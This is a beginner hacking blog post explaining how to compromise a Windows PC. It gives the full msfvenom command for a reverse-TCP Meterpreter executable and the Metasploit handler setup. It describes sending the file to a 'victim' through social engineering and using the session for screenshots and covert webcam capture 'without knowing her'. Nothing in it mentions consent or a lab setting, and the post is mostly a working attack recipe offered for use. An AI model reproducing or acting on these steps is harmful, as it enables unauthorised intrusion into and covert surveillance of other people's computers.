Hello Friends! Today we learn “how to hack computers for beginners”.Before reading this blog, read my previous blog in which I show you How To Hack Mobile Phone Using Kali Linux. Similarly, You can hack windows by sending a payload to the victim’s PC.
Once the user installs the payload your meterpreter session starts running and then you do anything with the victim’s PC. You can send this payload via social engineering and here lots of methods present to send that payload to the victim’s system.
DON’T MISS:- How To Hack Wifi Password Using Kali Linux?
Let’s Start, Open your terminal and type
ifconfig
to know your private IP.
then type
msfvenom -p windows/meterpreter/reverse_tcp lhost=’Your Private IP’ lport=4444 -f exe -a x86 > hackingblogs.exe
and then hit enter and your payload for windows is ready. Your payload is present in the root folder. Now, transfer this payload to your victim’s PC.
Now open your Metasploit by typing
msfconsole
After opening Metasploit. Just configure some settings. By typing
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ‘Your Private IP’
set lport 4444
exploit
Now, install the payload to the victim’s system and then you see here you get meterpreter session. So, enjoy the victim’s system is hacked and now you can change and configure anything to this hack PC. But here, I will show you some commands of using it. type
sysinfo
to check the information of the system.
type
screenshot
This will capture a screenshot of the victim’s PC.
You can also try webcam_snap & webcam_stream for taking pictures from victim’s device camera without knowing her. If you want some more commands then type
help
this will show you many different commands which you can use an exploit.
If you want more interesting stuff like this then do subscribe to my blog. It’s free of cost and if you want to read more interesting articles like this then you can go to my table of the content page by clicking here.
Comments
Post a Comment